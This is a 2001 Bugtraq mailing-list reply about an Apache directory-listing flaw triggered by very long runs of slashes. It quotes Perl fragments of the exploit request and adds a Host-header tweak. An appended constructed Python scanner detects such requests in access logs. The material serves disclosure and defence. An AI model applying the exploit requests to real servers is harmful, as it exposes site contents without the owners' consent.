Re: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit
From: Stephen Cope <mail-d-20010615 () kimihia org nz>
Date: Fri, 15 Jun 2001 14:48:44 +1200
In my testing you need to take the Host header into account.
: $url = "GET ";
: $buffer = "/" x $low . " HTTP/1.0\r\n";
: $end = "\r\n\r\n";
The server I tested against uses mod_rewrite to do virtual hosting, and it
arrived at a different magic number with the Host header than without the
header.
I made the following change to the above code:
$buffer = "/" x $low . " HTTP/1.0\r\nHost: ". $host ."\r\n";
Should be fairly easy to understand.
Stephen Cope <http://sdc.org.nz/>
Sign the petition and Stop the Pop: http://lifefm.org.nz/petition/
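
Added example, not part of the original post: a defender-side log check for the long-slash requests discussed above, grouped per virtual host because the post reports that the working length differs with the Host header. The log layout (LogFormat "%v %h %l %u %t \"%r\" %>s %b"), the 32-slash threshold, the hostnames, addresses and slash counts are all assumptions constructed for illustration.

```python
import re
from collections import defaultdict

MIN_RUN = 32  # assumed threshold: no legitimate URL needs this many consecutive slashes

# Assumed log layout: LogFormat "%v %h %l %u %t \"%r\" %>s %b"
LINE_RE = re.compile(r'^(\S+) (\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*" (\d{3}) \S+$')

def longest_slash_run(path):
    """Length of the longest run of consecutive '/' in the request path."""
    return max((len(m) for m in re.findall(r"/+", path)), default=0)

def scan(lines, min_run=MIN_RUN):
    """Group long-slash requests by (vhost, client) and summarise each group."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than guess
        vhost, client, _method, path, status = m.groups()
        run = longest_slash_run(path)
        if run >= min_run:
            hits[(vhost, client)].append((run, int(status)))
    report = {}
    for key, seen in hits.items():
        lengths = sorted({run for run, _ in seen})
        report[key] = {
            "requests": len(seen),
            "min_run": lengths[0],
            "max_run": lengths[-1],
            # several distinct lengths from one client looks like a search for a length
            "length_search": len(lengths) >= 3,
            # lengths the server answered with 200 instead of an error
            "served_200": sorted(run for run, st in seen if st == 200),
        }
    return report

def _line(vhost, client, path, status):
    # Constructed sample entry, not taken from a real server log.
    return f'{vhost} {client} - - [01/Jan/2001:00:00:00 +0000] "GET {path} HTTP/1.0" {status} 512'

SAMPLE = [
    _line("a.example.test", "192.0.2.10", "/index.html", 200),
    _line("a.example.test", "192.0.2.10", "/docs//page.html", 200),
    _line("a.example.test", "198.51.100.7", "/" * 1000, 403),
    _line("a.example.test", "198.51.100.7", "/" * 3000, 403),
    _line("a.example.test", "198.51.100.7", "/" * 4100, 200),
    _line("b.example.test", "198.51.100.7", "/" * 4100, 403),
]

if __name__ == "__main__":
    for (vhost, client), info in sorted(scan(SAMPLE).items()):
        print(vhost, client, info)
```

In the constructed sample the same length is answered with 200 on one virtual host and 403 on the other, so each vhost has to be reviewed on its own.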